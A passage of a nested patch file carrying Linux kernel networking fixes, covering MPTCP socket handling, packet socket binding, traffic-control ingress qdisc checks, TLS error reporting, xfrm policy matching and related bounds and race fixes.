+ 	if (!mptcp_pm_allow_new_subflow(msk))
+ 		goto err_prohibited;
+ 
+-	/* active connections are already on conn_list.
+-	 * If we can't acquire msk socket lock here, let the release callback
++	/* If we can't acquire msk socket lock here, let the release callback
+ 	 * handle it
+ 	 */
+ 	mptcp_data_lock(parent);
+@@ -3495,11 +3525,6 @@ err_prohibited:
+ 		return false;
+ 	}
+ 
+-	subflow->map_seq = READ_ONCE(msk->ack_seq);
+-	WRITE_ONCE(msk->allow_infinite_fallback, false);
+-
+-out:
+-	mptcp_event(MPTCP_EVENT_SUB_ESTABLISHED, msk, ssk, GFP_ATOMIC);
+ 	return true;
+ }
+ 
+@@ -3617,9 +3642,9 @@ static int mptcp_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len)
+ 	 * acquired the subflow socket lock, too.
+ 	 */
+ 	if (msk->fastopening)
+-		err = __inet_stream_connect(ssock, uaddr, addr_len, msk->connect_flags, 1);
++		err = __inet_stream_connect(ssock, uaddr, addr_len, O_NONBLOCK, 1);
+ 	else
+-		err = inet_stream_connect(ssock, uaddr, addr_len, msk->connect_flags);
++		err = inet_stream_connect(ssock, uaddr, addr_len, O_NONBLOCK);
+ 	inet_sk(sk)->defer_connect = inet_sk(ssock->sk)->defer_connect;
+ 
+ 	/* on successful connect, the msk state will be moved to established by
+@@ -3632,12 +3657,10 @@ static int mptcp_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len)
+ 
+ 	mptcp_copy_inaddrs(sk, ssock->sk);
+ 
+-	/* unblocking connect, mptcp-level inet_stream_connect will error out
+-	 * without changing the socket state, update it here.
++	/* silence EINPROGRESS and let the caller inet_stream_connect
++	 * handle the connection in progress
+ 	 */
+-	if (err == -EINPROGRESS)
+-		sk->sk_socket->state = ssock->state;
+-	return err;
++	return 0;
+ }
+ 
+ static struct proto mptcp_prot = {
+@@ -3696,18 +3719,6 @@ unlock:
+ 	return err;
+ }
+ 
+-static int mptcp_stream_connect(struct socket *sock, struct sockaddr *uaddr,
+-				int addr_len, int flags)
+-{
+-	int ret;
+-
+-	lock_sock(sock->sk);
+-	mptcp_sk(sock->sk)->connect_flags = flags;
+-	ret = __inet_stream_connect(sock, uaddr, addr_len, flags, 0);
+-	release_sock(sock->sk);
+-	return ret;
+-}
+-
+ static int mptcp_listen(struct socket *sock, int backlog)
+ {
+ 	struct mptcp_sock *msk = mptcp_sk(sock->sk);
+@@ -3746,7 +3757,10 @@ static int mptcp_stream_accept(struct socket *sock, struct socket *newsock,
+ 
+ 	pr_debug("msk=%p", msk);
+ 
+-	ssock = __mptcp_nmpc_socket(msk);
++	/* Buggy applications can call accept on socket states other then LISTEN
++	 * but no need to allocate the first subflow just to error out.
++	 */
++	ssock = READ_ONCE(msk->subflow);
+ 	if (!ssock)
+ 		return -EINVAL;
+ 
+@@ -3791,9 +3805,6 @@ static __poll_t mptcp_check_writeable(struct mptcp_sock *msk)
+ {
+ 	struct sock *sk = (struct sock *)msk;
+ 
+-	if (unlikely(sk->sk_shutdown & SEND_SHUTDOWN))
+-		return EPOLLOUT | EPOLLWRNORM;
+-
+ 	if (sk_stream_is_writeable(sk))
+ 		return EPOLLOUT | EPOLLWRNORM;
+ 
+@@ -3811,6 +3822,7 @@ static __poll_t mptcp_poll(struct file *file, struct socket *sock,
+ 	struct sock *sk = sock->sk;
+ 	struct mptcp_sock *msk;
+ 	__poll_t mask = 0;
++	u8 shutdown;
+ 	int state;
+ 
+ 	msk = mptcp_sk(sk);
+@@ -3819,23 +3831,30 @@ static __poll_t mptcp_poll(struct file *file, struct socket *sock,
+ 	state = inet_sk_state_load(sk);
+ 	pr_debug("msk=%p state=%d flags=%lx", msk, state, msk->flags);
+ 	if (state == TCP_LISTEN) {
+-		if (WARN_ON_ONCE(!msk->subflow || !msk->subflow->sk))
++		struct socket *ssock = READ_ONCE(msk->subflow);
++
++		if (WARN_ON_ONCE(!ssock || !ssock->sk))
+ 			return 0;
+ 
+-		return inet_csk_listen_poll(msk->subflow->sk);
++		return inet_csk_listen_poll(ssock->sk);
+ 	}
+ 
++	shutdown = READ_ONCE(sk->sk_shutdown);
++	if (shutdown == SHUTDOWN_MASK || state == TCP_CLOSE)
++		mask |= EPOLLHUP;
++	if (shutdown & RCV_SHUTDOWN)
++		mask |= EPOLLIN | EPOLLRDNORM | EPOLLRDHUP;
++
+ 	if (state != TCP_SYN_SENT && state != TCP_SYN_RECV) {
+ 		mask |= mptcp_check_readable(msk);
+-		mask |= mptcp_check_writeable(msk);
++		if (shutdown & SEND_SHUTDOWN)
++			mask |= EPOLLOUT | EPOLLWRNORM;
++		else
++			mask |= mptcp_check_writeable(msk);
+ 	} else if (state == TCP_SYN_SENT && inet_sk(sk)->defer_connect) {
+ 		/* cf tcp_poll() note about TFO */
+ 		mask |= EPOLLOUT | EPOLLWRNORM;
+ 	}
+-	if (sk->sk_shutdown == SHUTDOWN_MASK || state == TCP_CLOSE)
+-		mask |= EPOLLHUP;
+-	if (sk->sk_shutdown & RCV_SHUTDOWN)
+-		mask |= EPOLLIN | EPOLLRDNORM | EPOLLRDHUP;
+ 
+ 	/* This barrier is coupled with smp_wmb() in __mptcp_error_report() */
+ 	smp_rmb();
+@@ -3850,7 +3869,7 @@ static const struct proto_ops mptcp_stream_ops = {
+ 	.owner		   = THIS_MODULE,
+ 	.release	   = inet_release,
+ 	.bind		   = mptcp_bind,
+-	.connect	   = mptcp_stream_connect,
++	.connect	   = inet_stream_connect,
+ 	.socketpair	   = sock_no_socketpair,
+ 	.accept		   = mptcp_stream_accept,
+ 	.getname	   = inet_getname,
+@@ -3945,7 +3964,7 @@ static const struct proto_ops mptcp_v6_stream_ops = {
+ 	.owner		   = THIS_MODULE,
+ 	.release	   = inet6_release,
+ 	.bind		   = mptcp_bind,
+-	.connect	   = mptcp_stream_connect,
++	.connect	   = inet_stream_connect,
+ 	.socketpair	   = sock_no_socketpair,
+ 	.accept		   = mptcp_stream_accept,
+ 	.getname	   = inet6_getname,
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index 441feeaeb2427..55fc5e42082e0 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -288,7 +288,6 @@ struct mptcp_sock {
+ 			nodelay:1,
+ 			fastopening:1,
+ 			in_accept_queue:1;
+-	int		connect_flags;
+ 	struct work_struct work;
+ 	struct sk_buff  *ooo_last_skb;
+ 	struct rb_root  out_of_order_queue;
+@@ -297,7 +296,11 @@ struct mptcp_sock {
+ 	struct list_head rtx_queue;
+ 	struct mptcp_data_frag *first_pending;
+ 	struct list_head join_list;
+-	struct socket	*subflow; /* outgoing connect/listener/!mp_capable */
++	struct socket	*subflow; /* outgoing connect/listener/!mp_capable
++				   * The mptcp ops can safely dereference, using suitable
++				   * ONCE annotation, the subflow outside the socket
++				   * lock as such sock is freed after close().
++				   */
+ 	struct sock	*first;
+ 	struct mptcp_pm_data	pm;
+ 	struct {
+@@ -602,7 +605,6 @@ int mptcp_is_checksum_enabled(const struct net *net);
+ int mptcp_allow_join_id0(const struct net *net);
+ unsigned int mptcp_stale_loss_cnt(const struct net *net);
+ int mptcp_get_pm_type(const struct net *net);
+-void mptcp_copy_inaddrs(struct sock *msk, const struct sock *ssk);
+ void mptcp_subflow_fully_established(struct mptcp_subflow_context *subflow,
+ 				     struct mptcp_options_received *mp_opt);
+ bool __mptcp_retransmit_pending_data(struct sock *sk);
+@@ -671,9 +673,10 @@ void __init mptcp_proto_init(void);
+ int __init mptcp_proto_v6_init(void);
+ #endif
+ 
+-struct sock *mptcp_sk_clone(const struct sock *sk,
+-			    const struct mptcp_options_received *mp_opt,
+-			    struct request_sock *req);
++struct sock *mptcp_sk_clone_init(const struct sock *sk,
++				 const struct mptcp_options_received *mp_opt,
++				 struct sock *ssk,
++				 struct request_sock *req);
+ void mptcp_get_options(const struct sk_buff *skb,
+ 		       struct mptcp_options_received *mp_opt);
+ 
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 67ddbf6f2e4ee..336878f8a222a 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -633,14 +633,6 @@ static bool subflow_hmac_valid(const struct request_sock *req,
+ 	return !crypto_memneq(hmac, mp_opt->hmac, MPTCPOPT_HMAC_LEN);
+ }
+ 
+-static void mptcp_force_close(struct sock *sk)
+-{
+-	/* the msk is not yet exposed to user-space, and refcount is 2 */
+-	inet_sk_state_store(sk, TCP_CLOSE);
+-	sk_common_release(sk);
+-	sock_put(sk);
+-}
+-
+ static void subflow_ulp_fallback(struct sock *sk,
+ 				 struct mptcp_subflow_context *old_ctx)
+ {
+@@ -693,7 +685,6 @@ static struct sock *subflow_syn_recv_sock(const struct sock *sk,
+ 	struct mptcp_subflow_request_sock *subflow_req;
+ 	struct mptcp_options_received mp_opt;
+ 	bool fallback, fallback_is_fatal;
+-	struct sock *new_msk = NULL;
+ 	struct mptcp_sock *owner;
+ 	struct sock *child;
+ 
+@@ -722,14 +713,9 @@ static struct sock *subflow_syn_recv_sock(const struct sock *sk,
+ 		 * options.
+ 		 */
+ 		mptcp_get_options(skb, &mp_opt);
+-		if (!(mp_opt.suboptions & OPTIONS_MPTCP_MPC)) {
++		if (!(mp_opt.suboptions & OPTIONS_MPTCP_MPC))
+ 			fallback = true;
+-			goto create_child;
+-		}
+ 
+-		new_msk = mptcp_sk_clone(listener->conn, &mp_opt, req);
+-		if (!new_msk)
+-			fallback = true;
+ 	} else if (subflow_req->mp_join) {
+ 		mptcp_get_options(skb, &mp_opt);
+ 		if (!(mp_opt.suboptions & OPTIONS_MPTCP_MPJ) ||
+@@ -758,47 +744,19 @@ create_child:
+ 				subflow_add_reset_reason(skb, MPTCP_RST_EMPTCP);
+ 				goto dispose_child;
+ 			}
+-
+-			if (new_msk)
+-				mptcp_copy_inaddrs(new_msk, child);
+-			mptcp_subflow_drop_ctx(child);
+-			goto out;
++			goto fallback;
+ 		}
+ 
+ 		/* ssk inherits options of listener sk */
+ 		ctx->setsockopt_seq = listener->setsockopt_seq;
+ 
+ 		if (ctx->mp_capable) {
+-			owner = mptcp_sk(new_msk);
+-
+-			/* this can't race with mptcp_close(), as the msk is
+-			 * not yet exposted to user-space
+-			 */
+-			inet_sk_state_store((void *)new_msk, TCP_ESTABLISHED);
+-
+-			/* record the newly created socket as the first msk
+-			 * subflow, but don't link it yet into conn_list
+-			 */
+-			WRITE_ONCE(owner->first, child);
++			ctx->conn = mptcp_sk_clone_init(listener->conn, &mp_opt, child, req);
++			if (!ctx->conn)
++				goto fallback;
+ 
+-			/* new mpc subflow takes ownership of the newly
+-			 * created mptcp socket
+-			 */
+-			mptcp_sk(new_msk)->setsockopt_seq = ctx->setsockopt_seq;
++			owner = mptcp_sk(ctx->conn);
+ 			mptcp_pm_new_connection(owner, child, 1);
+-			mptcp_token_accept(subflow_req, owner);
+-			ctx->conn = new_msk;
+-			new_msk = NULL;
+-
+-			/* set msk addresses early to ensure mptcp_pm_get_local_id()
+-			 * uses the correct data
+-			 */
+-			mptcp_copy_inaddrs(ctx->conn, child);
+-			mptcp_propagate_sndbuf(ctx->conn, child);
+-
+-			mptcp_rcv_space_init(owner, child);
+-			list_add(&ctx->node, &owner->conn_list);
+-			sock_hold(child);
+ 
+ 			/* with OoO packets we can reach here without ingress
+ 			 * mpc option
+@@ -838,11 +796,6 @@ create_child:
+ 		}
+ 	}
+ 
+-out:
+-	/* dispose of the left over mptcp master, if any */
+-	if (unlikely(new_msk))
+-		mptcp_force_close(new_msk);
+-
+ 	/* check for expected invariant - should never trigger, just help
+ 	 * catching eariler subtle bugs
+ 	 */
+@@ -860,6 +813,10 @@ dispose_child:
+ 
+ 	/* The last child reference will be released by the caller */
+ 	return child;
++
++fallback:
++	mptcp_subflow_drop_ctx(child);
++	return child;
+ }
+ 
+ static struct inet_connection_sock_af_ops subflow_specific __ro_after_init;
+diff --git a/net/netfilter/nf_conntrack_netlink.c b/net/netfilter/nf_conntrack_netlink.c
+index 857cddd9d82e5..9ee8abd3e4b10 100644
+--- a/net/netfilter/nf_conntrack_netlink.c
++++ b/net/netfilter/nf_conntrack_netlink.c
+@@ -2976,7 +2976,9 @@ nla_put_failure:
+ 	return -1;
+ }
+ 
++#if IS_ENABLED(CONFIG_NF_NAT)
+ static const union nf_inet_addr any_addr;
++#endif
+ 
+ static __be32 nf_expect_get_id(const struct nf_conntrack_expect *exp)
+ {
+@@ -3460,10 +3462,12 @@ ctnetlink_change_expect(struct nf_conntrack_expect *x,
+ 	return 0;
+ }
+ 
++#if IS_ENABLED(CONFIG_NF_NAT)
+ static const struct nla_policy exp_nat_nla_policy[CTA_EXPECT_NAT_MAX+1] = {
+ 	[CTA_EXPECT_NAT_DIR]	= { .type = NLA_U32 },
+ 	[CTA_EXPECT_NAT_TUPLE]	= { .type = NLA_NESTED },
+ };
++#endif
+ 
+ static int
+ ctnetlink_parse_expect_nat(const struct nlattr *attr,
+diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
+index d1b19618890b7..6d493a0ccf399 100644
+--- a/net/netlink/af_netlink.c
++++ b/net/netlink/af_netlink.c
+@@ -1768,7 +1768,7 @@ static int netlink_getsockopt(struct socket *sock, int level, int optname,
+ 				break;
+ 			}
+ 		}
+-		if (put_user(ALIGN(nlk->ngroups / 8, sizeof(u32)), optlen))
++		if (put_user(ALIGN(BITS_TO_BYTES(nlk->ngroups), sizeof(u32)), optlen))
+ 			err = -EFAULT;
+ 		netlink_unlock_table();
+ 		return err;
+diff --git a/net/netrom/nr_subr.c b/net/netrom/nr_subr.c
+index 3f99b432ea707..e2d2af924cff4 100644
+--- a/net/netrom/nr_subr.c
++++ b/net/netrom/nr_subr.c
+@@ -123,7 +123,7 @@ void nr_write_internal(struct sock *sk, int frametype)
+ 	unsigned char  *dptr;
+ 	int len, timeout;
+ 
+-	len = NR_NETWORK_LEN + NR_TRANSPORT_LEN;
++	len = NR_TRANSPORT_LEN;
+ 
+ 	switch (frametype & 0x0F) {
+ 	case NR_CONNREQ:
+@@ -141,7 +141,8 @@ void nr_write_internal(struct sock *sk, int frametype)
+ 		return;
+ 	}
+ 
+-	if ((skb = alloc_skb(len, GFP_ATOMIC)) == NULL)
++	skb = alloc_skb(NR_NETWORK_LEN + len, GFP_ATOMIC);
++	if (!skb)
+ 		return;
+ 
+ 	/*
+@@ -149,7 +150,7 @@ void nr_write_internal(struct sock *sk, int frametype)
+ 	 */
+ 	skb_reserve(skb, NR_NETWORK_LEN);
+ 
+-	dptr = skb_put(skb, skb_tailroom(skb));
++	dptr = skb_put(skb, len);
+ 
+ 	switch (frametype & 0x0F) {
+ 	case NR_CONNREQ:
+diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
+index 67771b0f57719..6ab9d5b543387 100644
+--- a/net/packet/af_packet.c
++++ b/net/packet/af_packet.c
+@@ -3193,6 +3193,9 @@ static int packet_do_bind(struct sock *sk, const char *name, int ifindex,
+ 
+ 	lock_sock(sk);
+ 	spin_lock(&po->bind_lock);
++	if (!proto)
++		proto = po->num;
++
+ 	rcu_read_lock();
+ 
+ 	if (po->fanout) {
+@@ -3291,7 +3294,7 @@ static int packet_bind_spkt(struct socket *sock, struct sockaddr *uaddr,
+ 	memcpy(name, uaddr->sa_data, sizeof(uaddr->sa_data));
+ 	name[sizeof(uaddr->sa_data)] = 0;
+ 
+-	return packet_do_bind(sk, name, 0, pkt_sk(sk)->num);
++	return packet_do_bind(sk, name, 0, 0);
+ }
+ 
+ static int packet_bind(struct socket *sock, struct sockaddr *uaddr, int addr_len)
+@@ -3308,8 +3311,7 @@ static int packet_bind(struct socket *sock, struct sockaddr *uaddr, int addr_len
+ 	if (sll->sll_family != AF_PACKET)
+ 		return -EINVAL;
+ 
+-	return packet_do_bind(sk, NULL, sll->sll_ifindex,
+-			      sll->sll_protocol ? : pkt_sk(sk)->num);
++	return packet_do_bind(sk, NULL, sll->sll_ifindex, sll->sll_protocol);
+ }
+ 
+ static struct proto packet_proto = {
+diff --git a/net/packet/diag.c b/net/packet/diag.c
+index d704c7bf51b20..a68a84574c739 100644
+--- a/net/packet/diag.c
++++ b/net/packet/diag.c
+@@ -143,7 +143,7 @@ static int sk_diag_fill(struct sock *sk, struct sk_buff *skb,
+ 	rp = nlmsg_data(nlh);
+ 	rp->pdiag_family = AF_PACKET;
+ 	rp->pdiag_type = sk->sk_type;
+-	rp->pdiag_num = ntohs(po->num);
++	rp->pdiag_num = ntohs(READ_ONCE(po->num));
+ 	rp->pdiag_ino = sk_ino;
+ 	sock_diag_save_cookie(sk, rp->pdiag_cookie);
+ 
+diff --git a/net/sched/cls_flower.c b/net/sched/cls_flower.c
+index 25bc57ee6ea10..3de72e7c1075a 100644
+--- a/net/sched/cls_flower.c
++++ b/net/sched/cls_flower.c
+@@ -1147,6 +1147,9 @@ static int fl_set_geneve_opt(const struct nlattr *nla, struct fl_flow_key *key,
+ 	if (option_len > sizeof(struct geneve_opt))
+ 		data_len = option_len - sizeof(struct geneve_opt);
+ 
++	if (key->enc_opts.len > FLOW_DIS_TUN_OPTS_MAX - 4)
++		return -ERANGE;
++
+ 	opt = (struct geneve_opt *)&key->enc_opts.data[key->enc_opts.len];
+ 	memset(opt, 0xff, option_len);
+ 	opt->length = data_len / 4;
+diff --git a/net/sched/sch_api.c b/net/sched/sch_api.c
+index c82532e206992..f6a7b876d5954 100644
+--- a/net/sched/sch_api.c
++++ b/net/sched/sch_api.c
+@@ -1241,7 +1241,12 @@ static struct Qdisc *qdisc_create(struct net_device *dev,
+ 	sch->parent = parent;
+ 
+ 	if (handle == TC_H_INGRESS) {
+-		sch->flags |= TCQ_F_INGRESS;
++		if (!(sch->flags & TCQ_F_INGRESS)) {
++			NL_SET_ERR_MSG(extack,
++				       "Specified parent ID is reserved for ingress and clsact Qdiscs");
++			err = -EINVAL;
++			goto err_out3;
++		}
+ 		handle = TC_H_MAKE(TC_H_INGRESS, 0);
+ 	} else {
+ 		if (handle == 0) {
+@@ -1586,11 +1591,20 @@ replay:
+ 					NL_SET_ERR_MSG(extack, "Invalid qdisc name");
+ 					return -EINVAL;
+ 				}
++				if (q->flags & TCQ_F_INGRESS) {
++					NL_SET_ERR_MSG(extack,
++						       "Cannot regraft ingress or clsact Qdiscs");
++					return -EINVAL;
++				}
+ 				if (q == p ||
+ 				    (p && check_loop(q, p, 0))) {
+ 					NL_SET_ERR_MSG(extack, "Qdisc parent/child loop detected");
+ 					return -ELOOP;
+ 				}
++				if (clid == TC_H_INGRESS) {
++					NL_SET_ERR_MSG(extack, "Ingress cannot graft directly");
++					return -EINVAL;
++				}
+ 				qdisc_refcount_inc(q);
+ 				goto graft;
+ 			} else {
+diff --git a/net/sched/sch_ingress.c b/net/sched/sch_ingress.c
+index 84838128b9c5b..e43a454993723 100644
+--- a/net/sched/sch_ingress.c
++++ b/net/sched/sch_ingress.c
+@@ -80,6 +80,9 @@ static int ingress_init(struct Qdisc *sch, struct nlattr *opt,
+ 	struct net_device *dev = qdisc_dev(sch);
+ 	int err;
+ 
++	if (sch->parent != TC_H_INGRESS)
++		return -EOPNOTSUPP;
++
+ 	net_inc_ingress_queue();
+ 
+ 	mini_qdisc_pair_init(&q->miniqp, sch, &dev->miniq_ingress);
+@@ -101,6 +104,9 @@ static void ingress_destroy(struct Qdisc *sch)
+ {
+ 	struct ingress_sched_data *q = qdisc_priv(sch);
+ 
++	if (sch->parent != TC_H_INGRESS)
++		return;
++
+ 	tcf_block_put_ext(q->block, sch, &q->block_info);
+ 	net_dec_ingress_queue();
+ }
+@@ -134,7 +140,7 @@ static struct Qdisc_ops ingress_qdisc_ops __read_mostly = {
+ 	.cl_ops			=	&ingress_class_ops,
+ 	.id			=	"ingress",
+ 	.priv_size		=	sizeof(struct ingress_sched_data),
+-	.static_flags		=	TCQ_F_CPUSTATS,
++	.static_flags		=	TCQ_F_INGRESS | TCQ_F_CPUSTATS,
+ 	.init			=	ingress_init,
+ 	.destroy		=	ingress_destroy,
+ 	.dump			=	ingress_dump,
+@@ -219,6 +225,9 @@ static int clsact_init(struct Qdisc *sch, struct nlattr *opt,
+ 	struct net_device *dev = qdisc_dev(sch);
+ 	int err;
+ 
++	if (sch->parent != TC_H_CLSACT)
++		return -EOPNOTSUPP;
++
+ 	net_inc_ingress_queue();
+ 	net_inc_egress_queue();
+ 
+@@ -248,6 +257,9 @@ static void clsact_destroy(struct Qdisc *sch)
+ {
+ 	struct clsact_sched_data *q = qdisc_priv(sch);
+ 
++	if (sch->parent != TC_H_CLSACT)
++		return;
++
+ 	tcf_block_put_ext(q->egress_block, sch, &q->egress_block_info);
+ 	tcf_block_put_ext(q->ingress_block, sch, &q->ingress_block_info);
+ 
+@@ -269,7 +281,7 @@ static struct Qdisc_ops clsact_qdisc_ops __read_mostly = {
+ 	.cl_ops			=	&clsact_class_ops,
+ 	.id			=	"clsact",
+ 	.priv_size		=	sizeof(struct clsact_sched_data),
+-	.static_flags		=	TCQ_F_CPUSTATS,
++	.static_flags		=	TCQ_F_INGRESS | TCQ_F_CPUSTATS,
+ 	.init			=	clsact_init,
+ 	.destroy		=	clsact_destroy,
+ 	.dump			=	ingress_dump,
+diff --git a/net/smc/smc_llc.c b/net/smc/smc_llc.c
+index 524649d0ab652..3008dfdf7c55e 100644
+--- a/net/smc/smc_llc.c
++++ b/net/smc/smc_llc.c
+@@ -578,7 +578,10 @@ static struct smc_buf_desc *smc_llc_get_next_rmb(struct smc_link_group *lgr,
+ {
+ 	struct smc_buf_desc *buf_next;
+ 
+-	if (!buf_pos || list_is_last(&buf_pos->list, &lgr->rmbs[*buf_lst])) {
++	if (!buf_pos)
++		return _smc_llc_get_next_rmb(lgr, buf_lst);
++
++	if (list_is_last(&buf_pos->list, &lgr->rmbs[*buf_lst])) {
+ 		(*buf_lst)++;
+ 		return _smc_llc_get_next_rmb(lgr, buf_lst);
+ 	}
+@@ -614,6 +617,8 @@ static int smc_llc_fill_ext_v2(struct smc_llc_msg_add_link_v2_ext *ext,
+ 		goto out;
+ 	buf_pos = smc_llc_get_first_rmb(lgr, &buf_lst);
+ 	for (i = 0; i < ext->num_rkeys; i++) {
++		while (buf_pos && !(buf_pos)->used)
++			buf_pos = smc_llc_get_next_rmb(lgr, &buf_lst, buf_pos);
+ 		if (!buf_pos)
+ 			break;
+ 		rmb = buf_pos;
+@@ -623,8 +628,6 @@ static int smc_llc_fill_ext_v2(struct smc_llc_msg_add_link_v2_ext *ext,
+ 			cpu_to_be64((uintptr_t)rmb->cpu_addr) :
+ 			cpu_to_be64((u64)sg_dma_address(rmb->sgt[lnk_idx].sgl));
+ 		buf_pos = smc_llc_get_next_rmb(lgr, &buf_lst, buf_pos);
+-		while (buf_pos && !(buf_pos)->used)
+-			buf_pos = smc_llc_get_next_rmb(lgr, &buf_lst, buf_pos);
+ 	}
+ 	len += i * sizeof(ext->rt[0]);
+ out:
+diff --git a/net/sunrpc/svcsock.c b/net/sunrpc/svcsock.c
+index 7107fbcbff343..d808c00cdbac1 100644
+--- a/net/sunrpc/svcsock.c
++++ b/net/sunrpc/svcsock.c
+@@ -1338,25 +1338,10 @@ static struct svc_sock *svc_setup_socket(struct svc_serv *serv,
+ 	return svsk;
+ }
+ 
+-bool svc_alien_sock(struct net *net, int fd)
+-{
+-	int err;
+-	struct socket *sock = sockfd_lookup(fd, &err);
+-	bool ret = false;
+-
+-	if (!sock)
+-		goto out;
+-	if (sock_net(sock->sk) != net)
+-		ret = true;
+-	sockfd_put(sock);
+-out:
+-	return ret;
+-}
+-EXPORT_SYMBOL_GPL(svc_alien_sock);
+-
+ /**
+  * svc_addsock - add a listener socket to an RPC service
+  * @serv: pointer to RPC service to which to add a new listener
++ * @net: caller's network namespace
+  * @fd: file descriptor of the new listener
+  * @name_return: pointer to buffer to fill in with name of listener
+  * @len: size of the buffer
+@@ -1366,8 +1351,8 @@ EXPORT_SYMBOL_GPL(svc_alien_sock);
+  * Name is terminated with '\n'.  On error, returns a negative errno
+  * value.
+  */
+-int svc_addsock(struct svc_serv *serv, const int fd, char *name_return,
+-		const size_t len, const struct cred *cred)
++int svc_addsock(struct svc_serv *serv, struct net *net, const int fd,
++		char *name_return, const size_t len, const struct cred *cred)
+ {
+ 	int err = 0;
+ 	struct socket *so = sockfd_lookup(fd, &err);
+@@ -1378,6 +1363,9 @@ int svc_addsock(struct svc_serv *serv, const int fd, char *name_return,
+ 
+ 	if (!so)
+ 		return err;
++	err = -EINVAL;
++	if (sock_net(so->sk) != net)
++		goto out;
+ 	err = -EAFNOSUPPORT;
+ 	if ((so->sk->sk_family != PF_INET) && (so->sk->sk_family != PF_INET6))
+ 		goto out;
+diff --git a/net/tls/tls_strp.c b/net/tls/tls_strp.c
+index da95abbb7ea32..f37f4a0fcd3c2 100644
+--- a/net/tls/tls_strp.c
++++ b/net/tls/tls_strp.c
+@@ -20,7 +20,9 @@ static void tls_strp_abort_strp(struct tls_strparser *strp, int err)
+ 	strp->stopped = 1;
+ 
+ 	/* Report an error on the lower socket */
+-	strp->sk->sk_err = -err;
++	WRITE_ONCE(strp->sk->sk_err, -err);
++	/* Paired with smp_rmb() in tcp_poll() */
++	smp_wmb();
+ 	sk_error_report(strp->sk);
+ }
+ 
+diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
+index 992092aeebad9..96b4545ea700f 100644
+--- a/net/tls/tls_sw.c
++++ b/net/tls/tls_sw.c
+@@ -67,7 +67,9 @@ noinline void tls_err_abort(struct sock *sk, int err)
+ {
+ 	WARN_ON_ONCE(err >= 0);
+ 	/* sk->sk_err should contain a positive error code. */
+-	sk->sk_err = -err;
++	WRITE_ONCE(sk->sk_err, -err);
++	/* Paired with smp_rmb() in tcp_poll() */
++	smp_wmb();
+ 	sk_error_report(sk);
+ }
+ 
+@@ -2287,8 +2289,12 @@ static void tls_data_ready(struct sock *sk)
+ 	struct tls_context *tls_ctx = tls_get_ctx(sk);
+ 	struct tls_sw_context_rx *ctx = tls_sw_ctx_rx(tls_ctx);
+ 	struct sk_psock *psock;
++	gfp_t alloc_save;
+ 
++	alloc_save = sk->sk_allocation;
++	sk->sk_allocation = GFP_ATOMIC;
+ 	tls_strp_data_ready(&ctx->strp);
++	sk->sk_allocation = alloc_save;
+ 
+ 	psock = sk_psock_get(sk);
+ 	if (psock) {
+diff --git a/net/xfrm/xfrm_policy.c b/net/xfrm/xfrm_policy.c
+index bc04cb83215f9..e894c269affb1 100644
+--- a/net/xfrm/xfrm_policy.c
++++ b/net/xfrm/xfrm_policy.c
+@@ -3237,7 +3237,7 @@ xfrm_secpath_reject(int idx, struct sk_buff *skb, const struct flowi *fl)
+ 
+ static inline int
+ xfrm_state_ok(const struct xfrm_tmpl *tmpl, const struct xfrm_state *x,
+-	      unsigned short family)
++	      unsigned short family, u32 if_id)
+ {
+ 	if (xfrm_state_kern(x))
+ 		return tmpl->optional && !xfrm_state_addr_cmp(tmpl, x, tmpl->encap_family);
+@@ -3248,7 +3248,8 @@ xfrm_state_ok(const struct xfrm_tmpl *tmpl, const struct xfrm_state *x,
+ 		(tmpl->allalgs || (tmpl->aalgos & (1<<x->props.aalgo)) ||
+ 		 !(xfrm_id_proto_match(tmpl->id.proto, IPSEC_PROTO_ANY))) &&
+ 		!(x->props.mode != XFRM_MODE_TRANSPORT &&
+-		  xfrm_state_addr_cmp(tmpl, x, family));
++		  xfrm_state_addr_cmp(tmpl, x, family)) &&
++		(if_id == 0 || if_id == x->if_id);
+ }
+ 
+ /*
+@@ -3260,7 +3261,7 @@ xfrm_state_ok(const struct xfrm_tmpl *tmpl, const struct xfrm_state *x,
+  */
+ static inline int
+ xfrm_policy_ok(const struct xfrm_tmpl *tmpl, const struct sec_path *sp, int start,
+-	       unsigned short family)
++	       unsigned short family, u32 if_id)
+ {
+ 	int idx = start;
+ 
+@@ -3270,7 +3271,7 @@ xfrm_policy_ok(const struct xfrm_tmpl *tmpl, const struct sec_path *sp, int star
+ 	} else
+ 		start = -1;
+ 	for (; idx < sp->len; idx++) {
+-		if (xfrm_state_ok(tmpl, sp->xvec[idx], family))
++		if (xfrm_state_ok(tmpl, sp->xvec[idx], family, if_id))
+ 			return ++idx;
+ 		if (sp->xvec[idx]->props.mode != XFRM_MODE_TRANSPORT) {
+ 			if (start == -1)
+@@ -3649,7 +3650,7 @@ int __xfrm_policy_check(struct sock *sk, int dir, struct sk_buff *skb,
+ 		 * are implied between each two transformations.
+ 		 */
+ 		for (i = xfrm_nr-1, k = 0; i >= 0; i--) {
+-			k = xfrm_policy_ok(tpp[i], sp, k, family);
++			k = xfrm_policy_ok(tpp[i], sp, k, family, if_id);
+ 			if (k < 0) {
+ 				if (k < -1)
+ 					/* "-2 - errored_index" returned */
+diff --git a/security/selinux/Makefile b/security/selinux/Makefile
+index 0aecf9334ec31..8b21520bd4b9f 100644
+--- a/security/selinux/Makefile
++++ b/security/selinux/Makefile
+@@ -26,5 +26,9 @@ quiet_cmd_flask = GEN     $(obj)/flask.h $(obj)/av_permissions.h
+       cmd_flask = $< $(obj)/flask.h $(obj)/av_permissions.h
+ 
+ targets += flask.h av_permissions.h
+-$(obj)/flask.h $(obj)/av_permissions.h &: scripts/selinux/genheaders/genheaders FORCE
++# once make >= 4.3 is required, we can use grouped targets in the rule below,
++# which basically involves adding both headers and a '&' before the colon, see
++# the example below:
++#   $(obj)/flask.h $(obj)/av_permissions.h &: scripts/selinux/...
++$(obj)/flask.h: scripts/selinux/genheaders/genheaders FORCE
+ 	$(call if_changed,flask)
+diff --git a/sound/core/oss/pcm_plugin.h b/sound/core/oss/pcm_plugin.h
+index 46e273bd4a786..50a6b50f5db4c 100644
